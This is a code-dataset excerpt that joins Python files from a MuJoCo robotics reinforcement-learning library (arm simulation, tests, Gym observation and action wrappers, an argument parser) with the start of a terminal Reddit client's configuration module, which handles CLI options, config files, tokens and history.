for geom_id in range(mocap_geom_start_id, mocap_geom_end_id):
self.mj_sim.model.geom_rgba[geom_id, :] = 0.0
self.geom_ids = []
self.gripper_bodies = [
"robot0:gripper_base",
"left_gripper",
"left_inner_follower",
"left_outer_driver",
"right_gripper",
"right_inner_follower",
"right_outer_driver",
]
# Get the geom ids of all the bodies that make up the gripper
for gripper_body in self.gripper_bodies:
self.geom_ids.extend(geom_ids_of_body(self.mj_sim, gripper_body))
@classmethod
def build(
cls,
robot_control_params: RobotControlParameters,
n_substeps=40,
mujoco_timestep=0.001,
):
xml = cls.make_world_xml(
contact_params=dict(njmax=200, nconmax=200, nuserdata=200),
mujoco_timestep=mujoco_timestep,
)
xml = ArmSimulationInterface.make_robot_xml(xml, robot_control_params)
return cls(
xml.build(nsubsteps=n_substeps), robot_control_params=robot_control_params,
)
@classmethod
def make_world_xml(cls, *, contact_params: dict, mujoco_timestep: float, **kwargs):
return (
MujocoXML.parse(cls.BASE_XML)
.set_objects_attr(tag="option", timestep=mujoco_timestep)
.set_objects_attr(tag="size", **contact_params)
.add_default_compiler_directive()
)
@classmethod
def make_robot_xml(cls, xml, robot_control_params):
if robot_control_params.is_joint_actuated():
# Modifying xml is required because setting eq_active only was not enough to fully
# disable the mocap weld constraint. In my tests, setting eq_active to false would
# disable the constraint, but somehow the arm would not move when the joints were
# commanded. Removing from xml here seems to have the right effect.
xml.remove_objects_by_name("mocap_weld")
# Also add the actuations that are removed in the xml by default (since TCP does
# not need them).
joint_subdir = robot_control_params.arm_joint_calibration_path
xml.append(
MujocoXML.parse(
f"robot/ur16e/jointspec/calibrations/{joint_subdir}/ur16e_ik_class.xml"
)
)
xml.append(
MujocoXML.parse(
f"robot/ur16e/jointspec/calibrations/{joint_subdir}/joint_actuations.xml"
)
)
else:
# If not joint control mode or ik solver mode, use mocap defaults for joint parameters
xml.append(MujocoXML.parse("robot/ur16e/jointspec/ur16e_mocap_class.xml"))
# Add gripper actuators now (after joint actuators if required).
xml.append(MujocoXML.parse("robot/ur16e/gripper_actuators.xml"))
return xml
@property
def gripper(self):
return self._gripper
def render(
self,
width=DEFAULT_RENDER_SIZE,
height=DEFAULT_RENDER_SIZE,
*,
camera_name="vision_cam_front",
depth=False,
mode="offscreen",
device_id=-1,
):
data = super().render(
width=width,
height=height,
camera_name=camera_name,
depth=depth,
mode=mode,
device_id=device_id,
)
# original image is upside-down, so flip it
return data[::-1, :, :]
def get_gripper_table_contact(self) -> bool:
"""
Determine if any part of the gripper is touching the table by checking if there
is a collision between the table_collision_plane id and any gripper geom id.
"""
contacts = []
gripper_table_contact = False
# Sweep through all mj_sim contacts
for i in range(self.mj_sim.data.ncon):
c = self.mj_sim.data.contact[i]
# Check if any of the contacts involve at gripper geom id, append them to contacts:
if c.geom1 in self.geom_ids:
contacts.append(c.geom2)
elif c.geom2 in self.geom_ids:
contacts.append(c.geom1)
# Check if any of the contacts correspond to the `table` id:
for contact in contacts:
contact_name = self.mj_sim.model.geom_id2name(contact)
if contact_name == "table_collision_plane":
gripper_table_contact = True
return gripper_table_contact
```
#### File: utils/tests/test_reach_helper.py
```python
import logging
import time
from typing import Union
import numpy as np
from robogym.robot.utils import reach_helper
from robogym.robot.utils.measurement_units import MeasurementUnit
from robogym.robot.utils.reach_helper import ReachHelperDebugRecorder
logger = logging.getLogger(__name__)
def assert_speed_is_ok(
_debug_recorder: ReachHelperDebugRecorder,
_expected_speed: Union[float, np.ndarray],
_speed_limit_threshold: Union[float, np.ndarray],
) -> None:
"""This function inspects the speed samples from the given recorder (for all controls), and asserts whether
all are within the desired speed limit.
:param _debug_recorder: Recorder to check velocity samples.
:param _expected_speed: Speed limit that we set in the reach helper for the command generation.
:param _speed_limit_threshold: Small threshold that the robot would potentially pass above the commanded
expected speed, since reaction time will have a catch-up effect on the robot, which may cause speed to
increase over the commanded speed briefly.
"""
# prepare speed limit
actuator_count = len(_debug_recorder.robot.actuators())
if np.isscalar(_expected_speed):
_expected_speed = np.full(actuator_count, _expected_speed)
if np.isscalar(_speed_limit_threshold):
_speed_limit_threshold = np.full(actuator_count, _speed_limit_threshold)
speed_limit = _expected_speed + _speed_limit_threshold
# compare observed vs limit
max_obs_speed_per_control = np.max(np.abs(_debug_recorder.obs_vel), axis=0)
limit_ok_per_control = max_obs_speed_per_control < speed_limit
was_speed_ok = np.alltrue(limit_ok_per_control)
# assert/print relevant info
random_id = str(time.time())
if not was_speed_ok:
logger.info(
"Speed limit violation, will dump plots of the samples for debugging:"
)
for act_idx in range(len(_debug_recorder.obs_pos[0])):
_debug_recorder.plot_pos_and_vel_for_actuator(
act_idx,
reach_helper.PlotOutput.FILE,
MeasurementUnit.RADIANS,
MeasurementUnit.DEGREES,
f"test_reach_helper_{random_id}",
)
assert (
was_speed_ok
), f"Speed limit violation: \n{max_obs_speed_per_control} \nvs \n{speed_limit}"
def _build_reach_helper_test_robot(max_position_change=0.020):
from gym.envs.robotics import utils
from robogym.envs.rearrange.simulation.blocks import (
BlockRearrangeSim,
BlockRearrangeSimParameters,
)
from robogym.robot.robot_interface import ControlMode, RobotControlParameters
sim = BlockRearrangeSim.build(
n_substeps=20,
robot_control_params=RobotControlParameters(
control_mode=ControlMode.TCP_WRIST.value,
max_position_change=max_position_change,
),
simulation_params=BlockRearrangeSimParameters(),
)
# reset mocap welds if any. This is actually needed for TCP arms to move
utils.reset_mocap_welds(sim.mj_sim)
# extract arm since CompositeRobots are not fully supported by reach_helper
composite_robot = sim.robot
arm = composite_robot.robots[0]
arm.autostep = True
return arm
def test_curve_generation_two_steps() -> None:
"""This test is used to verify a bugfix. The bug was that if a target's distance is too close to the current
position (closer than the max speed), the curve would only generate one step for the actuator, and the step
would be for the current position, not for the target position. Bugfix: reach helper should generate at least
two steps.
"""
robot = _build_reach_helper_test_robot()
cur_pos = robot.observe().joint_positions()
# calculate the small step that was bugged
control_delta = robot.get_control_time_delta()
max_speed = np.deg2rad(60)
max_change_per_step = max_speed * control_delta
offset_that_was_bugged = max_change_per_step - np.deg2rad(
0.01
) # offset needs to be below max_change_per_step
position_threshold = offset_that_was_bugged - np.deg2rad(
0.01
) # threshold needs to be below the offset
assert position_threshold < offset_that_was_bugged
target_pos = cur_pos.copy()
target_pos[0] += offset_that_was_bugged
ret_i = reach_helper.reach_position(
robot,
target_pos,
speed_units_per_sec=max_speed,
position_threshold=position_threshold,
)
assert ret_i.reached
```
#### File: robogym/tests/test_robot_env.py
```python
import attr
from robogym.robot_env import build_nested_attr
def test_build_nested_attr():
@attr.s(auto_attribs=True)
class NestedParameters:
a: int = 0
b: int = 1
@attr.s(auto_attribs=True)
class Parameters:
nested: NestedParameters = build_nested_attr(NestedParameters)
@attr.s(auto_attribs=True)
class ParametersOverload(Parameters):
nested: NestedParameters = build_nested_attr(
NestedParameters, default=dict(a=2)
)
parameters = Parameters()
assert isinstance(parameters.nested, NestedParameters)
assert parameters.nested.a == 0
assert parameters.nested.b == 1
parameters = Parameters(nested={"a": 2})
assert isinstance(parameters.nested, NestedParameters)
assert parameters.nested.a == 2
assert parameters.nested.b == 1
parameters = ParametersOverload()
assert parameters.nested.a == 2
assert parameters.nested.b == 1
parameters = ParametersOverload(nested={"a": 3})
assert parameters.nested.a == 3
assert parameters.nested.b == 1
parameters = ParametersOverload(nested={"b": 3})
assert parameters.nested.a == 2
assert parameters.nested.b == 3
```
#### File: robogym/utils/parse_arguments.py
```python
import glob
import os
from robogym.worldgen.parser.normalize import normalize_value
def parse_arguments(argv):
"""
Takes list of arguments and splits them
to argument that are of form key=value, and dictionary.
Furhter, cleans arguments (expands *, ~), and
makes sure that they refer to files, then files
are local.
"""
argv = _expand_user_rewrite(argv)
argv = _expand_wildcard_rewrite(argv)
argv, kwargs = _extract_kwargs_rewrite(argv)
_eval_kwargs(kwargs)
names = argv
print("\nInferred:")
print("\tnames: %s" % " ".join(names))
print("\targuments: %s" % str(kwargs))
print("\n")
return names, kwargs
def _expand_wildcard_rewrite(argv):
"""
:param argv: list of values
:return: If arguments contains *, than try to expand it to all fitting files.
"""
ret = []
for arg in argv:
if "*" in arg:
new_name = glob.glob(arg)
assert len(new_name) > 0, (
'Couldn\'t find any expansion to the pattern "%s"' % arg
)
ret += new_name
else:
ret.append(arg)
return ret
def _expand_user_rewrite(argv):
"""
:param argv: list of values
:return: values after the rewrite. If value contains ~ then it's expanded to home directory.
"""
ret = []
for arg in argv:
if arg[0] == "~":
arg = os.path.expanduser(arg)
ret.append(arg)
return ret
def _extract_kwargs_rewrite(argv):
"""
Splits list into dictionary like arguments and remaining arguments.
:param argv: list of values
:return: arguments that doesnt look like key=value, and dictionary with remaining arguments.
"""
kwargs = {}
ret = []
for arg in argv:
if arg.find("=") > -1:
pos = arg.find("=")
key, value = arg[:pos], arg[pos + 1:]
kwargs[key] = normalize_value(value)
else:
ret.append(arg)
return ret, kwargs
def _eval_kwargs(kwargs):
"""
Evaluates values which are strings starting with `@`, e.g. "@[]" -> [].
:param kwargs: dictionary
:return: the same dictionary but with evaluated values
"""
for key, value in kwargs.items():
if isinstance(value, str) and value[0] == "@":
kwargs[key] = eval(value[1:])
```
#### File: robogym/wrappers/dactyl.py
```python
from collections import OrderedDict
import gym
import numpy as np
from robogym.robot.shadow_hand.hand_forward_kinematics import (
FINGERTIP_SITE_NAMES,
REFERENCE_SITE_NAMES,
)
from robogym.utils.sensor_utils import check_occlusion, occlusion_markers_exist
from robogym.wrappers import randomizations
class RandomizedPhasespaceFingersWrapper(randomizations.RandomizedBodyWrapper):
def __init__(self, env=None, fingertips_noise=0.003, reference_noise=0.001):
"""Randomize position of phasespace markers on fingers. Units in meters."""
super().__init__(env)
self._all_sites = [
(f"robot0:{name}", fingertips_noise) for name in FINGERTIP_SITE_NAMES
]
self._all_sites += [
(f"robot0:{name}", reference_noise) for name in REFERENCE_SITE_NAMES
]
def _get_observation_space_delta(self, sim):
site_idxes = [
sim.model.site_name2id(f"robot0:{c}")
for c in FINGERTIP_SITE_NAMES + REFERENCE_SITE_NAMES
]
return OrderedDict(
[("randomized_phasespace", sim.model.site_pos[site_idxes, :].shape)]
)
def _get_field(self, sim):
orig_pos = [None for _ in self._all_sites]
for idx, (name, noise) in enumerate(self._all_sites):
sensor_idx = sim.model.site_name2id(name)
orig_pos[idx] = sim.model.site_pos[sensor_idx, :].copy()
return np.array(orig_pos)
def _set_field(self, sim):
randomized_phasespace = []
for idx, (name, noise) in enumerate(self._all_sites):
sensor_idx = sim.model.site_name2id(name)
sim.model.site_pos[sensor_idx, :] = self._orig_value[
idx
] + self.unwrapped._random_state.uniform(-noise, noise, size=(3,))
randomized_phasespace.append(sim.model.site_pos[sensor_idx, :])
randomized_phasespace = np.array(randomized_phasespace, copy=True)
return OrderedDict([("randomized_phasespace_fingers", randomized_phasespace)])
class FingersOccludedPhasespaceMarkers(gym.ObservationWrapper):
def __init__(self, env):
"""Make phasespace markers disappear when the occlusion detectors have collision,
which is simulated by returning old phasespace values.
This relies on `RandomizeObservationWrapper` with "fingertip_pos" in the input
"levels".
"""
super().__init__(env)
self._key = "noisy_fingertip_pos"
self._n_markers = 5
self._obs_buffer = None
def reset(self, *args, **kwargs):
obs = self.env.reset(*args, **kwargs)
self._occlusion_markers_exist = occlusion_markers_exist(self.unwrapped.sim)
assert len(obs[self._key]) % 3 == 0
assert len(obs[self._key]) // 3 == self._n_markers
self._obs_buffer = obs[self._key].copy()
return obs
def observation(self, observation):
if not self._occlusion_markers_exist:
return observation
else:
new_observation = OrderedDict()
for key in observation:
new_observation[key] = observation[key]
# Freeze the fingertip_pos read if the finger is occluded.
is_occluded_list = check_occlusion(self.unwrapped.sim)
for i, is_occluded in enumerate(is_occluded_list):
if not is_occluded:
self._obs_buffer[3 * i: 3 * (i + 1)] = observation[self._key][
3 * i: 3 * (i + 1)
]
new_observation[self._key] = self._obs_buffer.copy()
self._obs_buffer = new_observation[self._key].copy()
return new_observation
class FingersFreezingPhasespaceMarkers(randomizations.FreezingPhasespaceMarkers):
def __init__(
self,
env=None,
key="noisy_fingertip_pos",
disappear_p_1s=0.2,
freeze_scale_s=1.0,
):
super().__init__(
env, key=key, disappear_p_1s=disappear_p_1s, freeze_scale_s=freeze_scale_s
)
class FingerSeparationWrapper(gym.Wrapper):
""" Immobilize and separate all fingers other than active finger. """
def __init__(self, env, active_finger):
super().__init__(env)
self.active_finger = active_finger
self.FINGERS = ("TH", "FF", "MF", "RF", "LF", "WR")
def reset(self, *args, **kwargs):
# Spreads fingers apart
finger_i = self.FINGERS.index(self.active_finger)
for i in range(len(self.FINGERS)):
if "F" in self.FINGERS[i] and i != finger_i:
if i < finger_i:
limit = 0
elif i > finger_i:
limit = 1
self._freeze_joint("{}J4".format(self.FINGERS[i]), 1)
self._freeze_joint("{}J3".format(self.FINGERS[i]), limit)
self._freeze_joint("{}J2".format(self.FINGERS[i]), 1)
self._freeze_joint("{}J1".format(self.FINGERS[i]), 1)
self._freeze_joint("{}J0".format(self.FINGERS[i]), 1)
if "TH" in self.FINGERS[i] and i != finger_i:
self._freeze_joint("{}J4".format(self.FINGERS[i]), 0)
self._freeze_joint("{}J3".format(self.FINGERS[i]), 1)
self._freeze_joint("{}J2".format(self.FINGERS[i]), 1)
self._freeze_joint("{}J1".format(self.FINGERS[i]), 0)
self._freeze_joint("{}J0".format(self.FINGERS[i]), 0)
return self.env.reset(*args, **kwargs)
def _freeze_joint(self, joint_name, limit):
if limit == 0:
diff = -0.01
else:
diff = 0.01
model = self.env.unwrapped.sim.model
if "robot0:" + joint_name in model.joint_names:
joint_id = model.joint_name2id("robot0:" + joint_name)
model.jnt_range[joint_id, limit] = (
model.jnt_range[joint_id, 1 - limit] + diff
)
class RandomizedRobotDampingWrapper(randomizations.RandomizedDampingWrapper):
def __init__(self, env=None, damping_range=[1 / 1.5, 1.5], robot_name="robot0"):
joint_names = [
name
for name in env.unwrapped.sim.model.joint_names
if name.startswith(robot_name + ":")
]
super().__init__(env, damping_range, joint_names)
class RandomizedRobotKpWrapper(randomizations.RandomizedKpWrapper):
def __init__(self, env=None, kp_range=[0.5, 2.0], robot_name="robot0"):
actuator_names = [
name
for name in env.unwrapped.sim.model.actuator_names
if name.startswith(robot_name + ":")
]
super().__init__(env, kp_range, actuator_names)
class FixedWristWrapper(gym.Wrapper):
def __init__(self, env=None, wrj0_pos=0.0):
self.wrj0_pos = wrj0_pos
super().__init__(env)
def reset(self, *args, **kwargs):
return self.env.reset(*args, **kwargs)
def step(self, action):
a_wrj0_id = self.env.unwrapped.sim.model.actuator_name2id("robot0:A_WRJ0")
ctrlrange = self.env.unwrapped.sim.model.actuator_ctrlrange[a_wrj0_id]
actuation_range = (ctrlrange[1] - ctrlrange[0]) / 2.0
joint_pos = self.env.unwrapped.sim.data.get_joint_qpos("robot0:WRJ0")
action[a_wrj0_id] = (self.wrj0_pos - joint_pos) / actuation_range
return self.env.step(action)
class RewardObservationWrapper(gym.Wrapper):
def __init__(self, env=None, reward_inds=None):
super().__init__(env)
self.reward_inds = reward_inds
self.shape = (len(reward_inds),) if reward_inds is not None else (1,)
env.observation_space.spaces["reward"] = gym.spaces.Box(
low=-np.inf, high=np.inf, shape=self.shape, dtype=np.float32
)
def reset(self, *args, **kwargs):
obs = self.env.reset(*args, **kwargs)
return self.observation(obs, None)
def observation(self, observation, reward):
observation["reward"] = self._reward_obs(reward)
return observation
def step(self, action):
ob, rew, done, info = self.env.step(action)
return self.observation(ob, rew), rew, done, info
def _reward_obs(self, reward):
if reward is None: # this should only be the case on reset
obs = np.zeros(self.shape)
else:
if (
self.reward_inds is None
): # This should only be the case when reward is a scalar
obs = np.array([reward])
else:
obs = np.array(reward[self.reward_inds])
return obs
DEFAULT_NOISE_LEVELS = {
"achieved_goal": {"uncorrelated": 0.001, "additive": 0.001},
}
```
#### File: robogym/wrappers/util.py
```python
import enum
from collections import OrderedDict
from copy import deepcopy
import gym
import numpy as np
from gym.spaces import Box, Dict
def update_obs_space(env, delta):
spaces = env.observation_space.spaces.copy()
for key, shape in delta.items():
spaces[key] = Box(-np.inf, np.inf, (np.prod(shape),), np.float32)
return Dict(spaces)
class BinSpacing(enum.Enum):
"""
An Enum class ti generate action bin spacing arrays.
"""
LINEAR = "linear"
EXPONENTIAL = "exponential" # Exponential binning. Expects a symmetric action space centered around zero
def get_bin_array(self, lower_bound, upper_bound, n_bins) -> np.ndarray:
if self is BinSpacing.LINEAR:
return np.linspace(lower_bound, upper_bound, n_bins)
else:
assert (
lower_bound == -upper_bound and n_bins % 2 == 1
), "Exponential binning is only supported on symmetric action space with an odd number of bins"
half_range = np.array([2 ** (-n) for n in range(n_bins // 2)]) * lower_bound
return np.concatenate([half_range, [0], -half_range[::-1]])
class DiscretizeActionWrapper(gym.ActionWrapper):
"""
A wrapper that maps a continuous gym action space into a discrete action space.
"""
# default action bins for DiscretizeActionWrapper
DEFAULT_BINS = 11
def __init__(
self, env=None, n_action_bins=DEFAULT_BINS, bin_spacing=BinSpacing.LINEAR
):
"""
n_action_bins: can be int or None
if None is passed, then DEFAULT_BINS will be used.
"""
super().__init__(env)
assert isinstance(env.action_space, Box)
self._disc_to_cont = []
if n_action_bins is None:
n_action_bins = self.DEFAULT_BINS
for low, high in zip(env.action_space.low, env.action_space.high):
self._disc_to_cont.append(
bin_spacing.get_bin_array(low, high, n_action_bins)
)
temp = [n_action_bins for _ in self._disc_to_cont]
self.action_space = gym.spaces.MultiDiscrete(temp)
self.action_space.seed(env.action_space.np_random.randint(0, 2 ** 32 - 1))
def action(self, action):
assert len(action) == len(self._disc_to_cont)
return np.array(
[m[a] for a, m in zip(action, self._disc_to_cont)], dtype=np.float32
)
class RewardNameWrapper(gym.Wrapper):
""" Sets the default reward name on the environment """
def __init__(self, env):
super().__init__(env)
unwrapped = self.env.unwrapped
if not hasattr(unwrapped, "reward_names"):
self.env.unwrapped.reward_names = ["env"]
def step(self, action):
return self.env.step(action)
def reset(self, **kwargs):
return self.env.reset(**kwargs)
class ClipObservationWrapper(gym.ObservationWrapper):
"""
Clips observations into a fixed range.
"""
def __init__(self, env=None, clip=100.0):
super().__init__(env)
self._clip = clip
def observation(self, observation):
clipped_observation = OrderedDict()
for key in observation:
clipped_observation[key] = np.clip(
observation[key], -self._clip, self._clip
)
return clipped_observation
def compute_relative_goals(self, *args, **kwargs):
self.env.compute_relative_goals(*args, **kwargs)
def compute_goal_reward(self, *args, **kwargs):
return self.env.compute_goal_reward(*args, **kwargs)
class ClipRewardWrapper(gym.RewardWrapper):
"""
Clips reward values into a fixed range.
"""
def __init__(self, env=None, clip=100.0):
super().__init__(env)
self._clip = clip
def reward(self, reward):
clipped_reward = np.clip(reward, -self._clip, self._clip)
return clipped_reward
def compute_relative_goals(self, *args, **kwargs):
self.env.compute_relative_goals(*args, **kwargs)
def compute_goal_reward(self, *args, **kwargs):
return self.env.compute_goal_reward(*args, **kwargs)
class ClipActionWrapper(gym.ActionWrapper):
""" Clips action values into a normalized space between -1 and 1"""
def action(self, action):
return np.clip(a=action, a_min=-1.0, a_max=1.0)
class IncrementalExpAvg(object):
""" A generic exponential moving average filter. """
def __init__(self, alpha, intial_value=None):
self._value = 0
self._t = 0
self._alpha = alpha
if intial_value is not None:
self.update(intial_value)
def update(self, observation):
self._value = self._value * self._alpha + (1 - self._alpha) * observation
self._t += 1
def get(self):
if self._value is None:
return None
else:
return self._value / (1 - self._alpha ** self._t)
class PreviousActionObservationWrapper(gym.Wrapper):
"""
Wrapper that annotates observations with a cached previous action.
"""
def __init__(self, env=None):
super().__init__(env)
env.observation_space.spaces["previous_action"] = deepcopy(env.action_space)
def reset(self, *args, **kwargs):
self.previous_action = np.zeros(self.env.action_space.shape)
return self.observation(self.env.reset(*args, **kwargs))
def observation(self, observation):
observation["previous_action"] = self.previous_action.copy()
return observation
def step(self, action):
self.previous_action = action.copy()
ob, rew, done, info = self.env.step(action)
return self.observation(ob), rew, done, info
def compute_relative_goals(self, *args, **kwargs):
self.env.compute_relative_goals(*args, **kwargs)
def compute_goal_reward(self, *args, **kwargs):
return self.env.compute_goal_reward(*args, **kwargs)
class SmoothActionWrapper(gym.Wrapper):
"""
Applies smoothing to the current action using an Exponential Moving Average filter.
"""
def __init__(self, env, alpha=0.0):
super().__init__(env)
self._alpha = alpha
delta = OrderedDict([("action_ema", self.env.action_space.shape)])
self.observation_space = update_obs_space(self.env, delta)
def reset(self, *args, **kwargs):
obs = self.env.reset(*args, **kwargs)
sim = self.unwrapped.sim
adjusted_alpha = np.power(
self._alpha, (sim.model.opt.timestep * sim.nsubsteps) / 0.08
)
self._ema = IncrementalExpAvg(alpha=adjusted_alpha)
obs["action_ema"] = np.zeros(self.env.action_space.shape)
return obs
def step(self, action):
self._ema.update(action)
action = self._ema.get()
obs, rew, done, info = self.env.step(action)
obs["action_ema"] = action
return obs, rew, done, info
class RelativeGoalWrapper(gym.ObservationWrapper):
"""
Wrapper that computes the 'relative goal' and 'achieved goal' observations for
environments.
"""
def __init__(self, env, obs_prefix=""):
# Prefix to map goal observation to state observation. This is a hack to
# handle inconsistent naming convention for cube environment observations
# e.g. goal_pos goal observation maps to cube_pos state observation.
self.obs_prefix = obs_prefix
super().__init__(env)
self.goal_obs_names = []
delta = OrderedDict()
for name, space in self.env.observation_space.spaces.items():
if name.startswith("goal_"):
delta[f"achieved_{name}"] = space.shape
delta[f"relative_{name}"] = space.shape
delta[f"noisy_achieved_{name}"] = space.shape
delta[f"noisy_relative_{name}"] = space.shape
obs_name = name[len("goal_"):]
assert (
f"{self.obs_prefix}{obs_name}" in self.env.observation_space.spaces
), (
f"Found {name} but not {self.obs_prefix}{obs_name} in observation space. "
f"RelativeGoalWrapper won't work. Available observation space: "
f"{sorted(self.env.observation_space.spaces.keys())}"
)
self.goal_obs_names.append(obs_name)
self.observation_space = update_obs_space(self.env, delta)
def observation(self, observation):
""" Calculate 'relative goal' and 'achieved goal' """
current_state = {
f"{self.obs_prefix}{n}": observation[f"{self.obs_prefix}{n}"]
for n in self.goal_obs_names
}
noisy_goal_state = {
f"{self.obs_prefix}{n}": observation[f"noisy_{self.obs_prefix}{n}"]
for n in self.goal_obs_names
}
relative_goal = self.env.unwrapped.goal_generation.relative_goal(
self.env.unwrapped._goal, current_state
)
noisy_relative_goal = self.env.unwrapped.goal_generation.relative_goal(
self.env.unwrapped._goal, noisy_goal_state
)
for name in self.goal_obs_names:
obs_name = f"{self.obs_prefix}{name}"
observation[f"achieved_goal_{name}"] = observation[obs_name].copy()
observation[f"relative_goal_{name}"] = relative_goal[obs_name]
observation[f"noisy_achieved_goal_{name}"] = observation[
f"noisy_{obs_name}"
].copy()
observation[f"noisy_relative_goal_{name}"] = noisy_relative_goal[obs_name]
return observation
class UnifiedGoalObservationWrapper(gym.ObservationWrapper):
"""Concatenates the pieces of every goal type"""
def __init__(
self, env, goal_keys=["relative_goal", "achieved_goal", "goal"], goal_parts=[],
):
super().__init__(env)
self.delta = OrderedDict()
for goal_key in goal_keys:
goal_len = sum(
[
self.observation_space.spaces[key].shape[0]
for key in self.observation_space.spaces.keys()
if key.startswith(goal_key)
]
)
self.delta[goal_key] = (goal_len,)
if any(
[
key.startswith("noisy_" + goal_key + "_")
for key in self.observation_space.spaces.keys()
]
):
self.delta["noisy_" + goal_key] = (goal_len,)
self.goal_parts = goal_parts
self.observation_space = update_obs_space(self.env, self.delta)
def observation(self, observation):
new_obs = OrderedDict()
for key, value in observation.items():
new_obs[key] = value
# It's a bit hacky to hard code observation key here but we have to do it now
# because we need to keep old policy backward compatible by keep observation order
# the same.
for goal_key in self.delta.keys():
goal_parts = [goal_key + "_" + part for part in self.goal_parts]
goal = np.concatenate(
[observation[key] for key in goal_parts if key in observation]
)
new_obs[goal_key] = goal
return new_obs
class SummedRewardsWrapper(gym.RewardWrapper):
"""
Ensures that reward is a scalar.
"""
def reward(self, reward):
return np.sum([reward])
``` |
{
"source": "0xflotus/rtv",
"score": 2
} |
#### File: rtv/rtv/config.py
```python
from __future__ import unicode_literals
import os
import codecs
import shutil
import argparse
from functools import partial
import six
from six.moves import configparser
from . import docs, __version__
from .objects import KeyMap
PACKAGE = os.path.dirname(__file__)
HOME = os.path.expanduser('~')
TEMPLATES = os.path.join(PACKAGE, 'templates')
DEFAULT_CONFIG = os.path.join(TEMPLATES, 'rtv.cfg')
DEFAULT_MAILCAP = os.path.join(TEMPLATES, 'mailcap')
DEFAULT_THEMES = os.path.join(PACKAGE, 'themes')
XDG_CONFIG_HOME = os.getenv('XDG_CONFIG_HOME', os.path.join(HOME, '.config'))
XDG_DATA_HOME = os.getenv('XDG_DATA_HOME', os.path.join(HOME, '.local', 'share'))
CONFIG = os.path.join(XDG_CONFIG_HOME, 'rtv', 'rtv.cfg')
MAILCAP = os.path.join(HOME, '.mailcap')
TOKEN = os.path.join(XDG_DATA_HOME, 'rtv', 'refresh-token')
HISTORY = os.path.join(XDG_DATA_HOME, 'rtv', 'history.log')
THEMES = os.path.join(XDG_CONFIG_HOME, 'rtv', 'themes')
def build_parser():
parser = argparse.ArgumentParser(
prog='rtv', description=docs.SUMMARY,
epilog=docs.CONTROLS,
usage=docs.USAGE,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument(
'link', metavar='URL', nargs='?',
help='[optional] Full URL of a submission to open')
parser.add_argument(
'-s', dest='subreddit',
help='Name of the subreddit that will be loaded on start')
parser.add_argument(
'-l', dest='link_deprecated',
help=argparse.SUPPRESS) # Deprecated, use the positional arg instead
parser.add_argument(
'--log', metavar='FILE', action='store',
help='Log HTTP requests to the given file')
parser.add_argument(
'--config', metavar='FILE', action='store',
help='Load configuration settings from the given file')
parser.add_argument(
'--ascii', action='store_const', const=True,
help='Enable ascii-only mode')
parser.add_argument(
'--monochrome', action='store_const', const=True,
help='Disable color')
parser.add_argument(
'--theme', metavar='FILE', action='store',
help='Color theme to use, see --list-themes for valid options')
parser.add_argument(
'--list-themes', metavar='FILE', action='store_const', const=True,
help='List all of the available color themes')
parser.add_argument(
'--non-persistent', dest='persistent', action='store_const', const=False,
help='Forget the authenticated user when the program exits')
parser.add_argument(
'--no-autologin', dest='autologin', action='store_const', const=False,
help='Do not authenticate automatically on startup')
parser.add_argument(
'--clear-auth', dest='clear_auth', action='store_const', const=True,
help='Remove any saved user data before launching')
parser.add_argument(
'--copy-config', dest='copy_config', action='store_const', const=True,
help='Copy the default configuration to {HOME}/.config/rtv/rtv.cfg')
parser.add_argument(
'--copy-mailcap', dest='copy_mailcap', action='store_const', const=True,
help='Copy an example mailcap configuration to {HOME}/.mailcap')
parser.add_argument(
'--enable-media', dest='enable_media', action='store_const', const=True,
help='Open external links using programs defined in the mailcap config')
parser.add_argument(
'-V', '--version', action='version', version='rtv ' + __version__)
parser.add_argument(
'--no-flash', dest='flash', action='store_const', const=False,
help='Disable screen flashing')
return parser
def copy_default_mailcap(filename=MAILCAP):
"""
Copy the example mailcap configuration to the specified file.
"""
return _copy_settings_file(DEFAULT_MAILCAP, filename, 'mailcap')
def copy_default_config(filename=CONFIG):
"""
Copy the default rtv user configuration to the specified file.
"""
return _copy_settings_file(DEFAULT_CONFIG, filename, 'config')
def _copy_settings_file(source, destination, name):
"""
Copy a file from the repo to the user's home directory.
"""
if os.path.exists(destination):
try:
ch = six.moves.input(
'File %s already exists, overwrite? y/[n]):' % destination)
if ch not in ('Y', 'y'):
return
except KeyboardInterrupt:
return
filepath = os.path.dirname(destination)
if not os.path.exists(filepath):
os.makedirs(filepath)
print('Copying default %s to %s' % (name, destination))
shutil.copy(source, destination)
os.chmod(destination, 0o664)
class OrderedSet(object):
"""
A simple implementation of an ordered set. A set is used to check
for membership, and a list is used to maintain ordering.
"""
def __init__(self, elements=None):
elements = elements or []
self._set = set(elements)
self._list = elements
def __contains__(self, item):
return item in self._set
def __len__(self):
return len(self._list)
def __getitem__(self, item):
return self._list[item]
def add(self, item):
self._set.add(item)
self._list.append(item)
class Config(object):
"""
This class manages the loading and saving of configs and other files.
"""
def __init__(self, history_file=HISTORY, token_file=TOKEN, **kwargs):
self.history_file = history_file
self.token_file = token_file
self.config = kwargs
default, bindings = self.get_file(DEFAULT_CONFIG)
self.default = default
self.keymap = KeyMap(bindings)
# `refresh_token` and `history` are saved/loaded at separate locations,
# so they are treated differently from the rest of the config options.
self.refresh_token = None
self.history = OrderedSet()
def __getitem__(self, item):
if item in self.config:
return self.config[item]
else:
return self.default.get(item, None)
def __setitem__(self, key, value):
self.config[key] = value
def __delitem__(self, key):
self.config.pop(key, None)
def update(self, **kwargs):
self.config.update(kwargs)
def load_refresh_token(self):
if os.path.exists(self.token_file):
with open(self.token_file) as fp:
self.refresh_token = fp.read().strip()
else:
self.refresh_token = None
def save_refresh_token(self):
self._ensure_filepath(self.token_file)
with open(self.token_file, 'w+') as fp:
fp.write(self.refresh_token)
def delete_refresh_token(self):
if os.path.exists(self.token_file):
os.remove(self.token_file)
self.refresh_token = None
def load_history(self):
if os.path.exists(self.history_file):
with codecs.open(self.history_file, encoding='utf-8') as fp:
self.history = OrderedSet([line.strip() for line in fp])
else:
self.history = OrderedSet()
def save_history(self):
self._ensure_filepath(self.history_file)
with codecs.open(self.history_file, 'w+', encoding='utf-8') as fp:
fp.writelines('\n'.join(self.history[-self['history_size']:]))
def delete_history(self):
if os.path.exists(self.history_file):
os.remove(self.history_file)
self.history = OrderedSet()
@staticmethod
def get_args():
"""
Load settings from the command line.
"""
parser = build_parser()
args = vars(parser.parse_args())
# Overwrite the deprecated "-l" option into the link variable
if args['link_deprecated'] and args['link'] is None:
args['link'] = args['link_deprecated']
args.pop('link_deprecated', None)
# Filter out argument values that weren't supplied
return {key: val for key, val in args.items() if val is not None}
@classmethod
def get_file(cls, filename=None):
